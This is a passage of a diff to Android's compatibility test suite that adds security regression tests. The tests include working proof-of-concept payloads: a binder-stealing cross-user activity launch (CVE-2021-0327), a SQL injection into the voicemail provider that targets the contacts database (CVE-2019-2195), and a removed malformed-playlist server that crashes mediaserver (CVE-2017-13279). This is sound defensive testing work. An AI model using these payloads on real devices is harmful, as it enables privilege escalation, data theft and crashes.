+ super.onCreate(savedInstanceState);
+ doMakeProviderBad(null);
+ SystemClock.sleep(5000);
+ doStuff(null);
+ }
+
+ public void doMakeProviderBad(View view) {
+ new MakeProviderBad().execute();
+ }
+
+ private class MakeProviderBad extends AsyncTask<Void, Void, Exception> {
+
+ @Override
+ protected Exception doInBackground(Void... voids) {
+ try {
+ if (sTakenBinder != null) {
+ sTakenBinder.close();
+ sTakenBinder = null;
+ }
+
+ Uri uri = getIntent().getClipData().getItemAt(0).getUri();
+ Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null);
+ IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a"));
+ sTakenBinder = iface.takeBinder();
+ if (sTakenBinder == null) {
+ throw new Exception("Failed to find binder of provider");
+ }
+ iface.exit();
+ } catch (Exception e) {
+ errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
+ }
+
+ return null;
+ }
+
+ @Override
+ protected void onPostExecute(Exception e) {
+ }
+ }
+
+ public void doStuff(View view) {
+ sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity");
+ }
+
+ @SuppressLint("PrivateApi")
+ void sendCommand(String... args) {
+ String[] command = new String[args.length + 2];
+ command[0] = "/system/bin/cmd";
+ command[1] = "activity";
+ System.arraycopy(args, 0, command, 2, args.length);
+
+ try{
+ Runtime.getRuntime().exec(command);
+ } catch(Exception e){
+ errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString();
+ }
+ finally{
+ synchronized(CVE_2021_0327.class){
+ CVE_2021_0327.testActivityRequested=true;
+ CVE_2021_0327.errorMessage = errorMessage;
+ CVE_2021_0327.class.notifyAll();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java
new file mode 100644
index 0000000..d44a220
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java
@@ -0,0 +1,17 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.util.Log;
+
+public class TestActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d("CVE_2021_0327","TestActivity.onCreate()");
+ synchronized(CVE_2021_0327.class){
+ CVE_2021_0327.testActivityCreated=true;
+ CVE_2021_0327.class.notifyAll();
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
new file mode 100644
index 0000000..d374dfd
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
@@ -0,0 +1,7 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.admin.DeviceAdminReceiver;
+
+public class AdminReceiver extends DeviceAdminReceiver {
+
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
new file mode 100644
index 0000000..1ae1c5d
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
@@ -0,0 +1,43 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+
+import android.security.cts.CVE_2021_0327.OtherUserActivity;
+
+public class ProvisionedActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ getPackageManager().setComponentEnabledSetting(
+ new ComponentName(
+ this,
+ OtherUserActivity.class
+ ),
+ PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
+ PackageManager.DONT_KILL_APP
+ );
+
+ DevicePolicyManager manager = getSystemService(DevicePolicyManager.class);
+ //IntentFilter intentFilter = new IntentFilter("com.example.clearedshell.OTHER_USER_ACTIVITY");
+ IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY");
+ //IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327$OTHER_USER_ACTIVITY");
+ intentFilter.addCategory(Intent.CATEGORY_DEFAULT);
+ ComponentName admin = new ComponentName(this, AdminReceiver.class);
+ manager.addCrossProfileIntentFilter(
+ admin,
+ intentFilter,
+ DevicePolicyManager.FLAG_MANAGED_CAN_ACCESS_PARENT
+ );
+ manager.setProfileEnabled(admin);
+
+ setResult(RESULT_OK);
+ finish();
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
new file mode 100644
index 0000000..a59d749
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
@@ -0,0 +1,142 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertThat;
+import static org.junit.Assume.assumeThat;
+import static org.hamcrest.Matchers.*;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.RemoteCallback;
+import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+import android.util.Log;
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+
+@SecurityTest
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0339 {
+
+ static final String TAG = CVE_2021_0339.class.getSimpleName();
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static final String CALLBACK_KEY = "testactivitycallback";
+ private static final String RESULT_KEY = "testactivityresult";
+ static final int DURATION_RESULT_CODE = 1;
+ static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max
+ static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag.
+
+ private void launchActivity(Class<? extends Activity> clazz, RemoteCallback cb) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(CALLBACK_KEY, cb);
+ context.startActivity(intent);
+ }
+
+ /**
+ * b/175817167
+ * start the first activity and get the result from the remote callback
+ */
+ @Test
+ @SecurityTest
+ public void testPocCVE_2021_0339() throws Exception {
+ CompletableFuture<Integer> callbackReturn = new CompletableFuture<>();
+ RemoteCallback cb = new RemoteCallback((Bundle result) ->
+ callbackReturn.complete(result.getInt(RESULT_KEY)));
+ launchActivity(FirstActivity.class, cb); // start activity with callback as intent extra
+
+ // blocking while the remotecallback is unset
+ int duration = callbackReturn.get(15, TimeUnit.SECONDS);
+
+ // if we couldn't get the duration of secondactivity in firstactivity, the default is -1
+ assumeThat(duration, not(equals(-1)));
+
+ // the max duration after the fix is 3 seconds.
+ // we check to see that the total duration was less than 8 seconds after accounting for lag
+ assertThat(duration,
+ lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS));
+ }
+
+ /**
+ * create an activity so that the second activity has something to animate from
+ * start the second activity and get the result
+ * return the result from the second activity in the remotecallback
+ */
+ public static class FirstActivity extends Activity {
+ private RemoteCallback cb;
+
+ @Override
+ public void onCreate(Bundle bundle) {
+ super.onCreate(bundle);
+ cb = (RemoteCallback) getIntent().getExtras().get(CALLBACK_KEY);
+ }
+
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ Intent intent = new Intent(this, SecondActivity.class);
+ intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis());
+ startActivityForResult(intent, DURATION_RESULT_CODE);
+ overridePendingTransition(R.anim.translate2,R.anim.translate1);
+ Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()");
+ }
+
+ @Override
+ protected void onActivityResult(int requestCode,int resultCode, Intent data) {
+ super.onActivityResult(requestCode, resultCode, data);
+ if (requestCode == DURATION_RESULT_CODE && resultCode == RESULT_OK) {
+ // this is the result that we requested
+ int duration = data.getIntExtra("duration", -1); // get result from secondactivity
+ Bundle res = new Bundle();
+ res.putInt(RESULT_KEY, duration);
+ finish();
+ cb.sendResult(res); // update callback in test
+ }
+ }
+ }
+
+ /**
+ * measure time since secondactivity start to secondactivity animation complete
+ * return the duration in the result
+ */
+ public static class SecondActivity extends Activity{
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ long completedTs = SystemClock.uptimeMillis();
+ long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0);
+ int duration = (int)(completedTs - startedTs);
+ Log.d(TAG, this.getLocalClassName()
+ + " onEnterAnimationComplete() duration=" + Long.toString(duration));
+ Intent durationIntent = new Intent();
+ durationIntent.putExtra("duration", duration);
+ setResult(RESULT_OK, durationIntent); // set result for firstactivity
+ finish(); // firstactivity only gets the result when we finish
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0394.java b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java
new file mode 100644
index 0000000..d3278ee
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java
@@ -0,0 +1,42 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import androidx.test.runner.AndroidJUnit4;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0394 {
+ static {
+ System.loadLibrary("ctssecurity_jni");
+ }
+
+ /**
+ * b/172655291
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0394() throws Exception {
+ assertFalse(poc());
+ }
+
+ public static native boolean poc();
+}
diff --git a/tests/tests/security/src/android/security/cts/CertificateData.java b/tests/tests/security/src/android/security/cts/CertificateData.java
index 0b4780f..118b40f 100644
--- a/tests/tests/security/src/android/security/cts/CertificateData.java
+++ b/tests/tests/security/src/android/security/cts/CertificateData.java
@@ -17,14 +17,12 @@
*/
package android.security.cts;
-import android.platform.test.annotations.SecurityTest;
/**
* Run "./cts/tools/utils/java-cert-list-generator.sh >
* cts/tests/tests/security/src/android/security/cts/CertificateData.java"
* to generate this file.
*/
-@SecurityTest
class CertificateData {
static final String[] CERTIFICATE_DATA = {
"91:C6:D6:EE:3E:8A:C8:63:84:E5:48:C2:99:29:5C:75:6C:81:7B:81",
diff --git a/tests/tests/security/src/android/security/cts/CertificateTest.java b/tests/tests/security/src/android/security/cts/CertificateTest.java
index 2d88988..7b1ed9d 100644
--- a/tests/tests/security/src/android/security/cts/CertificateTest.java
+++ b/tests/tests/security/src/android/security/cts/CertificateTest.java
@@ -20,7 +20,6 @@
import java.io.FileInputStream;
import java.io.IOException;
import android.content.pm.PackageManager;
-import android.platform.test.annotations.SecurityTest;
import android.test.AndroidTestCase;
import java.security.KeyStore;
import java.security.KeyStoreException;
@@ -37,7 +36,6 @@
import java.util.List;
import java.util.Set;
-@SecurityTest
public class CertificateTest extends AndroidTestCase {
// The directory for CA root certificates trusted by WFA (WiFi Alliance)
private static final String DIR_OF_CACERTS_FOR_WFA =
diff --git a/tests/tests/security/src/android/security/cts/SQLiteTest.java b/tests/tests/security/src/android/security/cts/SQLiteTest.java
new file mode 100644
index 0000000..47407ca
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/SQLiteTest.java
@@ -0,0 +1,81 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.content.Context;
+import android.content.ContentResolver;
+import android.content.Intent;
+import android.content.pm.PackageManager.NameNotFoundException;
+import android.net.Uri;
+import android.platform.test.annotations.SecurityTest;
+import android.provider.VoicemailContract;
+import android.test.AndroidTestCase;
+import androidx.test.InstrumentationRegistry;
+import static org.junit.Assert.*;
+
+@SecurityTest
+public class SQLiteTest extends AndroidTestCase {
+
+ private ContentResolver mResolver;
+ private String mPackageName;
+ private Context mContext;
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ mResolver = getContext().getContentResolver();
+ mContext = InstrumentationRegistry.getTargetContext();
+ mPackageName = mContext.getPackageName();
+ }
+
+ /**
+ * b/139186193
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ public void test_android_cve_2019_2195() {
+ Uri uri = VoicemailContract.Voicemails.CONTENT_URI;
+ uri = uri.buildUpon().appendQueryParameter("source_package", mPackageName).build();
+
+ try {
+ mContext.grantUriPermission(mPackageName, uri,
+ Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
+ | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
+ } catch (Exception e) {
+ if (e instanceof java.lang.SecurityException) {
+ // this suggests com.android.providers.contacts.VoicemailContentProvider
+ // does not allow granting of Uri permissions, hence return.
+ return;
+ }
+ }
+
+ try {
+ String fileToDump = mContext.createPackageContext("com.android.providers.contacts", 0)
+ .getDatabasePath("contacts2.db").getAbsolutePath();
+ try {
+ mResolver.query(uri, null, null, null,
+ "_id ASC LIMIT _TOKENIZE('calls(_data,_data,_data,source_package,type) VALUES(''"
+ + fileToDump + "'',?,?,''" + mPackageName + "'',4);',0,'','Z')")
+ .close();
+ fail("Vulnerable function exists");
+ } catch (android.database.sqlite.SQLiteException e) {
+ // do nothing
+ }
+ } catch (NameNotFoundException n) {
+ // do nothing
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 9a1a6df..a2d5ccd 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1146,91 +1146,6 @@
@Test
@SecurityTest(minPatchLevel = "2018-04")
- public void testStagefright_cve_2017_13279() throws Exception {
- Thread server = new Thread() {
- @Override
- public void run(){
- try (ServerSocket serverSocket = new ServerSocket(8080) {
- {setSoTimeout(10_000);} // time out after 10 seconds
- };
- Socket conn = serverSocket.accept()
- ) {
- OutputStream stream = conn.getOutputStream();
- byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n"
- + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes();
- stream.write(http);
- while(!conn.isClosed())
- stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
- + "a\na\na\na\na\na\na\na\n").getBytes());
- }
- catch(IOException e){
- }
- }
- };
- server.start();
- String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
- + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/"
- + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8";
- final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
- LooperThread t = new LooperThread(new Runnable() {
- @Override
- public void run() {
-
- MediaPlayer mp = new MediaPlayer();
- mp.setOnErrorListener(mpcl);
- mp.setOnPreparedListener(mpcl);
- mp.setOnCompletionListener(mpcl);
- RenderTarget renderTarget = RenderTarget.create();
- Surface surface = renderTarget.getSurface();
- mp.setSurface(surface);
- AssetFileDescriptor fd = null;
- try {
- mp.setDataSource(uri);
- mp.prepareAsync();
- } catch (IOException e) {
- Log.e(TAG, e.toString());
- } finally {
- closeQuietly(fd);
- }
-
- Looper.loop();
- mp.release();
- }
- });
- t.start();
- Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError
- // doesn't wait long enough
- assertFalse("Device *IS* vulnerable to CVE-2017-13279",
- mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
- t.stopLooper();
- t.join(); // wait for thread to exit so we're sure the player was released
- server.join();
- }
-
- @Test
- @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
@@ -1259,6 +1174,84 @@
***********************************************************/
@Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testStagefright_cve_2019_2245() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_2245);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2019-04")
+ public void testStagefright_cve_2018_13925() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_13925);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-12")
+ public void testStagefright_cve_2020_11139() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_11139);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3663() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3663);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-08")
+ public void testStagefright_cve_2020_11122() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_11122);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-07")
+ public void testStagefright_cve_2020_3688() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3688);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-11")
+ public void testStagefright_cve_2020_11168() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_11168);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3658() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3658);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-05")
+ public void testStagefright_cve_2020_3633() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3633);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3660() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3660);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3661() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3661);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-01")
+ public void testStagefright_cve_2019_14013() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_14013);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-06")
+ public void testStagefright_cve_2020_3662() throws Exception {
+ doStagefrightTest(R.raw.cve_2020_3662);
+ }
+
+ @Test
@SecurityTest(minPatchLevel = "2021-01")
public void testStagefright_cve_2021_0312() throws Exception {
assumeFalse(ModuleDetector.moduleIsPlayManaged(
@@ -1868,7 +1861,9 @@
Thread.sleep(CHECK_INTERVAL);
timeout -= CHECK_INTERVAL;
}
+
if (!reportFile.exists() || !reportFile.isFile() || !lockFile.exists()) {
+ Log.e(TAG, "couldn't get the report or lock file");
return null;
}
try (BufferedReader reader = new BufferedReader(new FileReader(reportFile))) {
@@ -1933,7 +1928,9 @@
if (what != MediaPlayer.MEDIA_ERROR_SERVER_DIED) {
what = newWhat;
}
+
lock.lock();
+ errored = true;
condition.signal();
lock.unlock();
@@ -1956,17 +1953,19 @@
public int waitForError() throws InterruptedException {
lock.lock();
- if (condition.awaitNanos(TIMEOUT_NS) <= 0) {
- Log.d(TAG, "timed out on waiting for error");
+ if (!errored && !completed) {
+ if (condition.awaitNanos(TIMEOUT_NS) <= 0) {
+ Log.d(TAG, "timed out on waiting for error. " +
+ "errored: " + errored + ", completed: " + completed);
+ }
}
lock.unlock();
- if (what != 0) {
+ if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) {
// Sometimes mediaserver signals a decoding error first, and *then* crashes
// due to additional in-flight buffers being processed, so wait a little
// and see if more errors show up.
+ Log.e(TAG, "couldn't get media crash yet, waiting 1 second");
SystemClock.sleep(1000);
- }
- if (what == MediaPlayer.MEDIA_ERROR_SERVER_DIED) {
JSONArray crashes = getCrashReport(name.getMethodName(), 5000);
if (crashes == null) {
Log.e(TAG, "Crash results not found for test " + name.getMethodName());
@@ -1979,8 +1978,8 @@
// 0 is the code for no error.
return 0;
}
-
}
+ Log.d(TAG, "waitForError finished with no errors.");
return what;
}
@@ -1997,6 +1996,7 @@
Condition condition = lock.newCondition();
int what;
boolean completed = false;
+ boolean errored = false;
}
class LooperThread extends Thread {
diff --git a/tests/tests/syncmanager/AndroidTest.xml b/tests/tests/syncmanager/AndroidTest.xml
index 4c53d79..72e13ae 100644
--- a/tests/tests/syncmanager/AndroidTest.xml
+++ b/tests/tests/syncmanager/AndroidTest.xml
@@ -48,6 +48,8 @@
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
<option name="package" value="android.content.syncmanager.cts" />
- <option name="runtime-hint" value="10m00s" />
+ <!-- max timeout of 10 min for each test -->
+ <option name="test-timeout" value="600000" />
+ <option name="runtime-hint" value="20m00s" />
</test>
</configuration>
diff --git a/tests/tests/textclassifier/Android.bp b/tests/tests/textclassifier/Android.bp
index 6a536ec..ba7df02 100644
--- a/tests/tests/textclassifier/Android.bp
+++ b/tests/tests/textclassifier/Android.bp
@@ -25,7 +25,7 @@
test_suites: [
"cts",
"general-tests",
- "mts"
+ "mts-extservices"
],
libs: ["android.test.base"],
static_libs: [
diff --git a/tests/tests/webkit/assets/webkit/page_with_link.html b/tests/tests/webkit/assets/webkit/page_with_link.html
index 50fb78a..4fbe869 100644
--- a/tests/tests/webkit/assets/webkit/page_with_link.html
+++ b/tests/tests/webkit/assets/webkit/page_with_link.html
@@ -15,6 +15,8 @@
<html>
<body>
- <a href="http://foo.com" id="link">a link</a>
+ <!-- This is a relative link to an arbitrary page also hosted on this
+ server. -->
+ <a href="/assets/webkit/test_blankPage.html" id="link">a link</a>
</body>
</html>
diff --git a/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java b/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java
index ac0283c..360895a 100644
--- a/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java
+++ b/tests/tests/webkit/src/android/webkit/cts/TestHtmlConstants.java
@@ -57,7 +57,11 @@
public static final String LOGIN_FORM_URL = "webkit/test_loginForm.html";
- public static final String EXT_WEB_URL1 = "http://www.example.com/";
+ // Note: tests should avoid loading external URLs if at all possible, since any changes to that
+ // public site (even if it doesn't currently exist) can affect test behavior. The ".test" TLD is
+ // OK because (1) it's reserved for testing by RFC2606 and (2) the test never navigates to this
+ // page.
+ public static final String EXT_WEB_URL1 = "http://www.example.test/";
public static final String PARAM_ASSET_URL = "webkit/test_queryparam.html";
public static final String ANCHOR_ASSET_URL = "webkit/test_anchor.html";
@@ -66,8 +70,9 @@
public static final String DATABASE_ACCESS_URL = "webkit/test_databaseaccess.html";
public static final String STOP_LOADING_URL = "webkit/test_stop_loading.html";
public static final String BLANK_TAG_URL = "webkit/blank_tag.html";
+ // A page with a link to an arbitrary page controlled by the test server (in this case,
+ // BLANK_PAGE_URL).
public static final String PAGE_WITH_LINK_URL = "webkit/page_with_link.html";
- public static final String URL_IN_PAGE_WITH_LINK = "http://foo.com/";
// Not a real page, just triggers a 404 response.
public static final String NON_EXISTENT_PAGE_URL = "webkit/generate_404.html";
public static final String BAD_IMAGE_PAGE_URL = "webkit/test_bad_image_url.html";
diff --git a/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java b/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java
index 81ea695..a99e9af 100644
--- a/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java
+++ b/tests/tests/webkit/src/android/webkit/cts/WebViewClientTest.java
@@ -204,8 +204,10 @@
}
}.run();
assertEquals(mainCallCount, mainWebViewClient.getShouldOverrideUrlLoadingCallCount());
- assertEquals(
- TestHtmlConstants.URL_IN_PAGE_WITH_LINK, childWebViewClient.getLastShouldOverrideUrl());
+ // PAGE_WITH_LINK_URL has a link to BLANK_PAGE_URL (an arbitrary page also controlled by the
+ // test server)
+ assertEquals(mWebServer.getAssetUrl(TestHtmlConstants.BLANK_PAGE_URL),
+ childWebViewClient.getLastShouldOverrideUrl());
}
private void clickOnLinkUsingJs(final String linkId, WebViewOnUiThread webViewOnUiThread) {
diff --git a/tests/tests/wifi/Android.bp b/tests/tests/wifi/Android.bp
index 895527d..aa269cf 100644
--- a/tests/tests/wifi/Android.bp
+++ b/tests/tests/wifi/Android.bp
@@ -43,7 +43,8 @@
"cts",
"general-tests",
"mts",
- "sts",
+ "mts-tethering",
+ "sts",
],